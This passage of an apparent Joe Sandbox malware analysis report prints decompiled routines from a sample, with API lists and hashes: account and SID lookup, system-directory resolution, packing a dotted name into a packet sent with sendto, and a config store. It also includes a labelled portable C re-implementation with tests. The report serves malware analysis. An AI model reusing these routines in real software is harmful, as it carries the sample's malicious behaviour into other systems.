				_a8 = _a8 + _a4;
				_t69 = _t69 + 0xc;  // stack cleanup for the three pushed arguments
				// Release the string allocated by ConvertSidToStringSidA.
				LocalFree(_v8);
				goto L8;
			}

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameA.ADVAPI32(?,0040D7C3), ref: 00406F7A
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0040D7C3), ref: 00406FC1
                                                                                                                                  • ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 00406FE8
                                                                                                                                  • LocalFree.KERNEL32(00000120), ref: 0040701F
                                                                                                                                  • wsprintfA.USER32 ref: 00407036
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
                                                                                                                                  • String ID: /%d$|
                                                                                                                                  • API String ID: 676856371-4124749705
                                                                                                                                  • Opcode ID: 473b18cc682185cad3921d3bacaa7dea67b37dc77049966f098f71850abf7020
                                                                                                                                  • Instruction ID: 25602f0bb6ce76eb5d01febd46d0227a680cec7408ef54ec30c82d1084126da1
                                                                                                                                  • Opcode Fuzzy Hash: 473b18cc682185cad3921d3bacaa7dea67b37dc77049966f098f71850abf7020
                                                                                                                                  • Instruction Fuzzy Hash: B5313C72900209BFDB01DFA5DC45BDB7BBCEF04314F048166F949EB241DA79EA588B98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                   			E00406CC9(void* __ecx) {
                                                                                                                                   				/* Resolves a system directory path once and caches it in the global
                                                                                                                                   				 * buffer at 0x412e08; every API below is given a size of 0x104 (MAX_PATH). */
                                                                                                                                   				_Unknown_base(*)()* _t8;
                                                                                                                                   				CHAR* _t17;
                                                                                                                                   				void* _t18;
                                                                                                                                   				void* _t23;
                                                                                                                                   				char _t25;
                                                                                                                                   				void* _t34;
                                                                                                                                   
                                                                                                                                   				_t23 = __ecx;
                                                                                                                                   				if( *0x412e08 != 0) {
                                                                                                                                   					L14:
                                                                                                                                   					return 0x412e08;   /* already resolved: hand back the cached path */
                                                                                                                                   				}
                                                                                                                                   				/* GetSystemWow64DirectoryA is resolved at run time instead of being
                                                                                                                                   				 * imported; it is missing on hosts without the WoW64 layer. */
                                                                                                                                   				_t8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemWow64DirectoryA");
                                                                                                                                   				if(_t8 == 0) {
                                                                                                                                   					L4:
                                                                                                                                   					/* Fallback chain: system directory, then Windows directory, then a
                                                                                                                                   					 * string that E00402544 decodes into the scratch buffer at 0x4122f8. */
                                                                                                                                   					if(GetSystemDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
                                                                                                                                   						if(GetWindowsDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
                                                                                                                                   							E0040EF00(0x412e08, E00402544(0x4122f8, 0x410664, 0xb, 0xe4, 0xc8));   /* copy decoded string */
                                                                                                                                   							E0040EE2A(_t23, 0x4122f8, 0, 0x100);   /* appears to zero the 0x100-byte scratch buffer */
                                                                                                                                   							_t34 = _t34 + 0x28;
                                                                                                                                   						}
                                                                                                                                   						/* Whenever GetSystemDirectoryA failed, a second decoded string is appended,
                                                                                                                                   						 * whether the path came from GetWindowsDirectoryA or from the first string. */
                                                                                                                                   						E0040EF1E(0x412e08, E00402544(0x4122f8, 0x410658, 0xb, 0xe4, 0xc8));
                                                                                                                                   						E0040EE2A(_t23, 0x4122f8, 0, 0x100);
                                                                                                                                   					}
                                                                                                                                   					L10:
                                                                                                                                   					/* Scan to the terminator to measure the path ... */
                                                                                                                                   					_t17 = 0x412e08;
                                                                                                                                   					goto L11;
                                                                                                                                   					L11:
                                                                                                                                   					_t25 =  *_t17;
                                                                                                                                   					_t17 =  &(_t17[1]);
                                                                                                                                   					if(_t25 != 0) {
                                                                                                                                   						goto L11;
                                                                                                                                   					} else {
                                                                                                                                   						_t18 = _t17 - 0x412e09;   /* _t18 = strlen(path) */
                                                                                                                                   						/* ... and append a trailing '\' (0x5c) plus terminator if the last
                                                                                                                                   						 * character is not already one. No bound on the buffer is checked here. */
                                                                                                                                   						if( *((char*)(_t18 + 0x412e07)) != 0x5c) {
                                                                                                                                   							 *((char*)(_t18 + 0x412e08)) = 0x5c;
                                                                                                                                   							 *((char*)(_t18 + 0x412e09)) = _t25;   /* _t25 is 0 at this point */
                                                                                                                                   						}
                                                                                                                                   						goto L14;
                                                                                                                                   					}
                                                                                                                                   				}
                                                                                                                                   				/* GetSystemWow64DirectoryA was found: call it through the pointer with
                                                                                                                                   				 * the same (buffer, 0x104) arguments; on failure fall into the chain above. */
                                                                                                                                   				_push(0x104);
                                                                                                                                   				_push(0x412e08);
                                                                                                                                   				if( *_t8() == 0 ||  *0x412e08 == 0) {
                                                                                                                                   					goto L4;
                                                                                                                                   				} else {
                                                                                                                                   					goto L10;
                                                                                                                                   				}
                                                                                                                                   			}

                                                                                                                                   Instruction addresses for the decompiled lines above (Joe Sandbox per-line annotation, in listing order; 0x00000000 marks a line with no mapped address):
                                                                                                                                   0x00406cc9 0x00406cd6 0x00406dbe 0x00406dc1 0x00406dc1 0x00406cee 0x00406cfb 0x00406d12 0x00406d1c 0x00406d40
                                                                                                                                   0x00406d60 0x00406d69 0x00406d6e 0x00406d6e 0x00406d86 0x00406d8f 0x00406d98 0x00406d99 0x00406d99 0x00406d9e
                                                                                                                                   0x00406d9f 0x00406d9f 0x00406da1 0x00406da4 0x00000000 0x00406da6 0x00406da6 0x00406daf 0x00406db1 0x00406db8
                                                                                                                                   0x00406db8 0x00000000 0x00406daf 0x00406da4 0x00406cfd 0x00406cfe 0x00406d03 0x00000000 0x00000000 0x00000000
                                                                                                                                   0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,004122F8,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                                                                  • GetSystemDirectoryA.KERNEL32 ref: 00406D14
                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                                                                  • String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$kernel32
                                                                                                                                  • API String ID: 1082366364-3395550214
                                                                                                                                  • Opcode ID: bc03c77ada90e60c0bc9b65eb9809c5406ccea75b26a037b4d1e2b725433b91c
                                                                                                                                  • Instruction ID: 283af98db633f334a3c96cb566aa979ace8a56c3c0d7b64ee1e11c7fdc897f47
                                                                                                                                  • Opcode Fuzzy Hash: bc03c77ada90e60c0bc9b65eb9809c5406ccea75b26a037b4d1e2b725433b91c
                                                                                                                                  • Instruction Fuzzy Hash: AC21F26174034479F72157225D89FF72E4C8F52744F19407AF804B62D2CAED88E582AD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%
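The following is an added example, not code from the sample or from the Joe Sandbox report: a portable C re-implementation of the control flow of E00406CC9 above (cached global, GetSystemWow64DirectoryA looked up at run time, then GetSystemDirectoryA, then GetWindowsDirectoryA, then two decoded strings, then trailing-backslash normalization) so the reconstructed logic can be checked against concrete inputs. The Win32 calls are replaced by constructed provider callbacks, and the two embedded strings (EMBEDDED_ROOT, EMBEDDED_SUFFIX), the provider outputs and all helper names are assumptions; the report does not show what E00402544 decodes. It deliberately goes one step beyond the listing: ensure_trailing_backslash refuses to write when the separator and terminator would not fit in the 0x104-byte buffer, a check the decompiled loop at L11 does not make.

```c
/* Added example: portable re-implementation of the E00406CC9 control flow.
 * Not code from the sample or the report. Win32 calls are replaced by
 * constructed provider callbacks so the logic runs offline on any host. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define PATH_CAP 0x104                 /* buffer size the sample passes to each API */

/* Constructed stand-ins for the two strings E00402544 decodes (assumption:
 * their real contents are not shown in the report excerpt). */
#define EMBEDDED_ROOT   "C:\\Windows"
#define EMBEDDED_SUFFIX "\\SysWOW64"

/* Win32-style contract: write a NUL-terminated path, return its length, or 0 on
 * failure. A NULL provider models a GetProcAddress miss. */
typedef size_t (*dir_provider)(char *buf, size_t cap);

/* Append '\' unless the path already ends with one. Unlike the loop at L11 in
 * the listing, this refuses when the separator and NUL would not fit in cap. */
static int ensure_trailing_backslash(char *buf, size_t cap)
{
    size_t len = strlen(buf);
    if (len == 0 || len >= cap) return 0;
    if (buf[len - 1] == '\\')    return 1;
    if (len + 2 > cap)           return 0;
    buf[len] = '\\';
    buf[len + 1] = '\0';
    return 1;
}

/* Bounded stand-ins for E0040EF00 (copy) and E0040EF1E (append). */
static int bounded_copy(char *dst, size_t cap, const char *src)
{
    size_t n = strlen(src);
    if (n + 1 > cap) return 0;
    memcpy(dst, src, n + 1);
    return 1;
}
static int bounded_append(char *dst, size_t cap, const char *src)
{
    size_t have = strlen(dst), n = strlen(src);
    if (have + n + 1 > cap) return 0;
    memcpy(dst + have, src, n + 1);
    return 1;
}

/* Success means the API returned non-zero AND left a non-empty path: the two
 * conditions the listing tests after every directory call. */
static int try_provider(dir_provider p, char *buf, size_t cap)
{
    buf[0] = '\0';
    return p != NULL && p(buf, cap) != 0 && buf[0] != '\0';
}

/* Same fallback order as E00406CC9. Returns buf, or NULL if nothing usable fits. */
static const char *resolve_target_dir(char *buf, size_t cap,
                                      dir_provider wow64_dir, dir_provider system_dir,
                                      dir_provider windows_dir,
                                      const char *root, const char *suffix)
{
    if (buf[0] != '\0')                      /* already resolved: cached result */
        return buf;
    if (!try_provider(wow64_dir, buf, cap) && !try_provider(system_dir, buf, cap)) {
        /* Past GetSystemDirectoryA the listing copies the first decoded string
         * only when GetWindowsDirectoryA also fails, but appends the second
         * one unconditionally. */
        if (!try_provider(windows_dir, buf, cap) && !bounded_copy(buf, cap, root))
            return NULL;
        if (!bounded_append(buf, cap, suffix))
            return NULL;
    }
    return ensure_trailing_backslash(buf, cap) ? buf : NULL;
}

/* Constructed provider outputs (sample data, not captured from a real host). */
static size_t fake_wow64_dir(char *b, size_t c)   { return bounded_copy(b, c, "C:\\Windows\\SysWOW64") ? strlen(b) : 0; }
static size_t fake_system_dir(char *b, size_t c)  { return bounded_copy(b, c, "C:\\Windows\\system32") ? strlen(b) : 0; }
static size_t fake_windows_dir(char *b, size_t c) { return bounded_copy(b, c, "C:\\Windows") ? strlen(b) : 0; }
static size_t failing_dir(char *b, size_t c)      { (void)b; (void)c; return 0; }

/* Resolve with a given chain into a fresh buffer and compare with expected. */
static int resolves_to(dir_provider wow64, dir_provider sys, dir_provider win, const char *expected)
{
    char out[PATH_CAP] = "";
    const char *r = resolve_target_dir(out, PATH_CAP, wow64, sys, win, EMBEDDED_ROOT, EMBEDDED_SUFFIX);
    return r != NULL && strcmp(r, expected) == 0;
}

/* A pre-populated buffer must come back untouched (first check in E00406CC9). */
static int cache_is_honoured(void)
{
    char out[PATH_CAP] = "D:\\cached\\";
    const char *r = resolve_target_dir(out, PATH_CAP, fake_wow64_dir, fake_system_dir,
                                       fake_windows_dir, EMBEDDED_ROOT, EMBEDDED_SUFFIX);
    return r == out && strcmp(out, "D:\\cached\\") == 0;
}

/* Does a path of path_len non-separator chars leave room for the separator? */
static int separator_fits(size_t path_len)
{
    char out[PATH_CAP];
    if (path_len >= PATH_CAP) return 0;
    memset(out, 'A', path_len);
    out[path_len] = '\0';
    return ensure_trailing_backslash(out, PATH_CAP);
}

int main(void)
{
    printf("wow64 API present  : %d\n", resolves_to(fake_wow64_dir, fake_system_dir, fake_windows_dir, "C:\\Windows\\SysWOW64\\"));
    printf("no wow64 API       : %d\n", resolves_to(NULL, fake_system_dir, fake_windows_dir, "C:\\Windows\\system32\\"));
    printf("only GetWindowsDir : %d\n", resolves_to(NULL, failing_dir, fake_windows_dir, "C:\\Windows\\SysWOW64\\"));
    printf("cache honoured     : %d\n", cache_is_honoured());
    printf("258/259-char paths : %d %d\n", separator_fits(258), separator_fits(259));
    return 0;
}
```

The four resolution cases correspond to the four exits of the listing: the Wow64 pointer succeeding (goto L10 directly), GetSystemDirectoryA succeeding, GetWindowsDirectoryA succeeding with the suffix appended, and every API failing with both decoded strings used. The last two checks show why the bound matters with a MAX_PATH buffer: a 258-character path still has room for the separator and terminator, a 259-character one does not.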

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _write_multi_char$__get_printf_count_output__mbtowc_l_get_int_arg_write_string
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4168457693-0
                                                                                                                                  • Opcode ID: f7012a2b4727eafad902f081be100c809fce816dd7738765f83eb90d9cd604d5
                                                                                                                                  • Instruction ID: 6c63f3ddf49572ac79c6d8e251c1f7650864198d5e2a559435b00663c8f182db
                                                                                                                                  • Opcode Fuzzy Hash: f7012a2b4727eafad902f081be100c809fce816dd7738765f83eb90d9cd604d5
                                                                                                                                  • Instruction Fuzzy Hash: 25A181B1E002289BDB24DB46DC81BAEB374AB44308F54449AE6097B282D7786E84CF5D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: '$0$9
                                                                                                                                  • API String ID: 3120068967-269856862
                                                                                                                                  • Opcode ID: 7bbc5f25a49e61d68743073381ab8708b2bd49eee730fca9a6a09fabe99c0665
                                                                                                                                  • Instruction ID: a00eee181b3eeb95df4b7ce26ca00e0e60aed49754cb2fdd6ab912959dcfa0b4
                                                                                                                                  • Opcode Fuzzy Hash: 7bbc5f25a49e61d68743073381ab8708b2bd49eee730fca9a6a09fabe99c0665
                                                                                                                                  • Instruction Fuzzy Hash: C441E4B1E05229DFEB24CF58D889BAEB7B5BB84304F6481DAD049A7240C7789E81CF45
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 26%
                                                                                                                                   			E004026FF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, long _a12) {
                                                                                                                                   				/* Builds a record in a 0x400-byte buffer held at *0x412bf8, then walks the
                                                                                                                                   				 * dotted string passed in __eax, measuring each '.'-separated run. */
                                                                                                                                   				long* _t33;
                                                                                                                                   				long _t35;
                                                                                                                                   				long* _t36;
                                                                                                                                   				long _t37;
                                                                                                                                   				long _t38;
                                                                                                                                   				short _t39;
                                                                                                                                   				short _t40;
                                                                                                                                   				char _t42;
                                                                                                                                   				intOrPtr _t43;
                                                                                                                                   				void* _t48;
                                                                                                                                   				long* _t49;
                                                                                                                                   				long* _t51;
                                                                                                                                   				long* _t52;
                                                                                                                                   				long* _t53;
                                                                                                                                   				long* _t54;
                                                                                                                                   				void* _t55;
                                                                                                                                   				long* _t56;
                                                                                                                                   				long* _t57;
                                                                                                                                   				long* _t60;
                                                                                                                                   				intOrPtr* _t63;
                                                                                                                                   				intOrPtr* _t65;
                                                                                                                                   				void* _t66;
                                                                                                                                   
                                                                                                                                   				_t65 = __eax;
                                                                                                                                   				_t33 =  *0x412bf8; // 0x0
                                                                                                                                   				_t42 = 0;
                                                                                                                                   				if(_t33 == 0) {
                                                                                                                                   					_t33 = E0040EBCC(0x400);   /* first use: allocate the 0x400-byte buffer once */
                                                                                                                                   					_pop(_t48);
                                                                                                                                   					 *0x412bf8 = _t33;
                                                                                                                                   				}
                                                                                                                                   				E0040EE2A(_t48, _t33, _t42, 0x400);   /* zero it (same helper as in E00406CC9) */
                                                                                                                                   				_t35 = GetTickCount();
                                                                                                                                   				_t49 =  *0x412bf8; // 0x0
                                                                                                                                   				_t63 = __imp__#9;   /* import resolved by ordinal 9; the DLL is not named in this listing */
                                                                                                                                   				 *_t49 = _t35;   /* tick count stored at offset 0 */
                                                                                                                                   				_t36 =  *0x412bf8; // 0x0
                                                                                                                                   				_t36[0] = _a12;
                                                                                                                                   				_t37 =  *_t63(1);   /* ordinal-9 import called with the constant 1 */
                                                                                                                                   				_t51 =  *0x412bf8; // 0x0
                                                                                                                                   				_t51[1] = _t37;
                                                                                                                                   				_t52 =  *0x412bf8; // 0x0
                                                                                                                                   				_t38 = 0;
                                                                                                                                   				_t52[1] = 0;
                                                                                                                                   				_t53 =  *0x412bf8; // 0x0
                                                                                                                                   				_t53[2] = 0;
                                                                                                                                   				_t54 =  *0x412bf8; // 0x0
                                                                                                                                   				_t54[2] = 0;
                                                                                                                                   				_t60 =  *0x412bf8; // 0x0
                                                                                                                                   				_t55 = 0;
                                                                                                                                   				if( *_t65 != _t42) {
                                                                                                                                   					do {
                                                                                                                                   						/* _t38 marks the start of the current run; _a12 advances to the next
                                                                                                                                   						 * '.' (0x2e) or to the terminator. */
                                                                                                                                   						_t43 =  *((intOrPtr*)(_t38 + _t65));
                                                                                                                                   						_a12 = _t38;
                                                                                                                                   						while(_t43 != 0) {
                                                                                                                                   							if(_t43 != 0x2e) {
                                                                                                                                   								_a12 = _a12 + 1;
                                                                                                                                   								_t43 =  *((intOrPtr*)(_a12 + _t65));
                                                                                                                                   								continue;
                                                                                                                                   							}
                                                                                                                                   							break;
                                                                                                                                   						}
                                                                                                                                   						 *((char*)(_t55 +  &(_t60[3]))) = _a12 - _t38;   /* run length stored as one byte */
                                                                                                                                  						_t55 = _t55 + 1;
                                                                                                                                  						while(_t38 < _a12) {
                                                                                                                                  							 *((char*)(_t55 +  &(_t60[3]))) =  *((intOrPtr*)(_t38 + _t65));
                                                                                                                                  							_t55 = _t55 + 1;
                                                                                                                                  							_t38 = _t38 + 1;
                                                                                                                                  						}
                                                                                                                                  						if( *((char*)(_t38 + _t65)) == 0x2e) {
                                                                                                                                  							_t38 = _t38 + 1;
                                                                                                                                  						}
                                                                                                                                  						_t42 = 0;
                                                                                                                                  					} while ( *((intOrPtr*)(_t38 + _t65)) != 0);
                                                                                                                                  				}
                                                                                                                                  				 *((char*)(_t55 +  &(_t60[3]))) = _t42;
                                                                                                                                  				_t24 = _t55 + 0xd; // 0xf
                                                                                                                                  				_t66 = _t24;
                                                                                                                                  				_t39 =  *_t63(0xf);
                                                                                                                                  				_t56 =  *0x412bf8; // 0x0
                                                                                                                                  				 *((short*)(_t56 + _t66)) = _t39;
                                                                                                                                  				_t40 =  *_t63(1);
                                                                                                                                  				_t57 =  *0x412bf8; // 0x0
                                                                                                                                  				 *((short*)(_t57 + _t66 + 2)) = _t40;
                                                                                                                                  				__imp__#20(_a4, 0x412bf8, _t66 + 4, _t42, _a8, 0x10);
                                                                                                                                  				return 0 | _t40 <= 0x00000000;
                                                                                                                                  			}
                                                                                                                                  Instruction address column (63 entries, 0x00402704 to 0x00402815; the accompanying disassembly text was not captured)

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040272E
                                                                                                                                  • htons.WS2_32(00000001), ref: 00402752
                                                                                                                                  • htons.WS2_32(0000000F), ref: 004027D5
                                                                                                                                  • htons.WS2_32(00000001), ref: 004027E3
                                                                                                                                  • sendto.WS2_32(?,00412BF8,00000009,00000000,00000010,00000010), ref: 00402802
                                                                                                                                    • Part of subcall function 0040EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
                                                                                                                                    • Part of subcall function 0040EBCC: HeapAlloc.KERNEL32(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: htons$Heap$AllocCountProcessTicksendto
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1802437671-3142137124
                                                                                                                                  • Opcode ID: 6324b7b9e2dccaab36c5df195a5e4e953a761730b1da31182c129fee2206b1b7
                                                                                                                                  • Instruction ID: e317574a351225f02cdc10e669db3389ba019fd1a924c3d0ab3f78f3d9a30560
                                                                                                                                  • Opcode Fuzzy Hash: 6324b7b9e2dccaab36c5df195a5e4e953a761730b1da31182c129fee2206b1b7
                                                                                                                                  • Instruction Fuzzy Hash: B8313A342483969FD7108F74DD80AA27760FF19318B19C07EE855DB3A2D6B6E892D718
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _write_multi_char$__mbtowc_l_get_int_arg_write_string
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4186970751-0
                                                                                                                                  • Opcode ID: a9b0658f57c9b68557d3b915ef1ce8d4fa1ad7a417cb490e0d2228624f03d81f
                                                                                                                                  • Instruction ID: f39460077ea95656aa980f8ee85ddbd5759fc33d01551210f6fb9fd778779053
                                                                                                                                  • Opcode Fuzzy Hash: a9b0658f57c9b68557d3b915ef1ce8d4fa1ad7a417cb490e0d2228624f03d81f
                                                                                                                                  • Instruction Fuzzy Hash: 52A173B1E002289BDB24CF56DC817AEB7B5BB44305F5481DAE6096B281D7386E84CF5D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E0040E8A1(void* __edx, char _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16) {
                                                                                                                                  				CHAR* _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				CHAR* _v20;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				CHAR* _v28;
                                                                                                                                  				CHAR* _v32;
                                                                                                                                  				intOrPtr _v36;
                                                                                                                                  				char _v37;
                                                                                                                                  				char _v52;
                                                                                                                                  				char _v56;
                                                                                                                                  				intOrPtr _t87;
                                                                                                                                  				intOrPtr _t95;
                                                                                                                                  				int _t126;
                                                                                                                                  				void* _t136;
                                                                                                                                  				void* _t138;
                                                                                                                                  				CHAR* _t139;
                                                                                                                                  				void* _t146;
                                                                                                                                  				char _t150;
                                                                                                                                  				void* _t154;
                                                                                                                                  				void* _t158;
                                                                                                                                  				void* _t159;
                                                                                                                                  
                                                                                                                                  				_t146 = __edx;
                                                                                                                                  				_v20 = 0;
                                                                                                                                  				E0040DD05();
                                                                                                                                  				_t150 = _a4;
                                                                                                                                  				_t158 = E0040DD84(_t150, _a8);
                                                                                                                                  				_pop(_t138);
                                                                                                                                  				if(_t158 != 0) {
                                                                                                                                  					L2:
                                                                                                                                  					_t16 = _t158 + 0x30; // 0x30
                                                                                                                                  					_v8 = E00402419(_t138, _t16,  *((intOrPtr*)(_t158 + 0x24)), _a12);
                                                                                                                                  					_t21 = lstrlenA(_a12) + 1; // 0x1
                                                                                                                                  					_t136 = _t21;
                                                                                                                                  					_t87 = lstrlenA(_a16) + _t136 + 1;
                                                                                                                                  					_v16 = _t87;
                                                                                                                                  					if(_v8 == 0) {
                                                                                                                                  						_t139 =  *((intOrPtr*)(_t158 + 0x24));
                                                                                                                                  						_v12 = _v12 & 0x00000000;
                                                                                                                                  						_v8 = _t139;
                                                                                                                                  						_t152 = _t139;
                                                                                                                                  					} else {
                                                                                                                                  						_t126 = lstrlenA(_v8);
                                                                                                                                  						_t152 = _v8 - _t136 - _t158 + 0xffffffd0;
                                                                                                                                  						_v12 = _t126 + _t136 + 1;
                                                                                                                                  						_t87 = _v16;
                                                                                                                                  						_v8 = _v8 - _t136 - _t158 + 0xffffffd0;
                                                                                                                                  					}
                                                                                                                                  					if(_v12 == _t87) {
                                                                                                                                  						E0040EE08(_t152 + _t158 + 0x30, _a12, _t136);
                                                                                                                                  						E0040EE08(_t152 + _t136 + _t158 + 0x30, _a16, _v16 - _t136);
                                                                                                                                  						_t77 = _t158 + 0x30; // 0x30
                                                                                                                                  						_t95 = E004024C2(_t77,  *((intOrPtr*)(_t158 + 0x24)), 0);
                                                                                                                                  						if( *((intOrPtr*)(_t158 + 0x20)) != _t95) {
                                                                                                                                  							 *((intOrPtr*)(_t158 + 0x20)) = _t95;
                                                                                                                                  							 *0x4136c0 = 1;
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						_t41 = _t87 + 0x24; // 0x24
                                                                                                                                  						_t154 = E0040EBCC( *((intOrPtr*)(_t158 + 0x24)) - _v12 + _t41);
                                                                                                                                  						if(_t154 != 0) {
                                                                                                                                  							_t43 = _t158 + 0xc; // 0xc
                                                                                                                                  							E0040EE08(_t154, _t43,  &(_v8[0x24]));
                                                                                                                                  							 *((intOrPtr*)(_t154 + 0x18)) =  *((intOrPtr*)(_t158 + 0x24)) - _v12 + _v16;
                                                                                                                                  							_v20 =  &(_v8[_t154]);
                                                                                                                                  							E0040EE08( &(( &(_v8[_t154]))[0x24]), _a12, _t136);
                                                                                                                                  							E0040EE08( &(_v20[_t136 + 0x24]), _a16, _v16 - _t136);
                                                                                                                                  							E0040EE08( &(_v20[_v16 + 0x24]),  &(( &(_v8[_v12]))[_t158 + 0x30]),  *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12);
                                                                                                                                  							_t66 = _t154 + 0x24; // 0x24
                                                                                                                                  							 *((intOrPtr*)(_t154 + 0x14)) = E004024C2(_t66,  *((intOrPtr*)(_t154 + 0x18)), 0);
                                                                                                                                  							E0040DF4C( *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12, _t154);
                                                                                                                                  							E0040EC2E(_t154);
                                                                                                                                  							_v20 = 1;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					L10:
                                                                                                                                  					E0040DD69();
                                                                                                                                  					return _v20;
                                                                                                                                  				}
                                                                                                                                  				_v56 = _t150;
                                                                                                                                  				_v28 = 0;
                                                                                                                                  				_v24 = 3;
                                                                                                                                  				lstrcpynA( &_v52, _a8, 0x10);
                                                                                                                                  				_v37 = 0;
                                                                                                                                  				_v32 = 0;
                                                                                                                                  				_v36 = E004024C2( &_v20, 0, 0);
                                                                                                                                  				E0040DF4C(_t146,  &_v56);
                                                                                                                                  				_t158 = E0040DD84(_t150, _a8);
                                                                                                                                  				_t159 = _t159 + 0x18;
                                                                                                                                  				if(_t158 == 0) {
                                                                                                                                  					goto L10;
                                                                                                                                  				}
                                                                                                                                  				goto L2;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                                                                    • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                                                                    • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                                                                    • Part of subcall function 0040DD84: lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0040DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0040E3A7,000000F0), ref: 0040DDB5
                                                                                                                                  • lstrcpynA.KERNEL32(?,00401E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?), ref: 0040E8DE
                                                                                                                                  • lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E935
                                                                                                                                  • lstrlenA.KERNEL32(00000001,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?,0000000A), ref: 0040E93D
                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E94F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
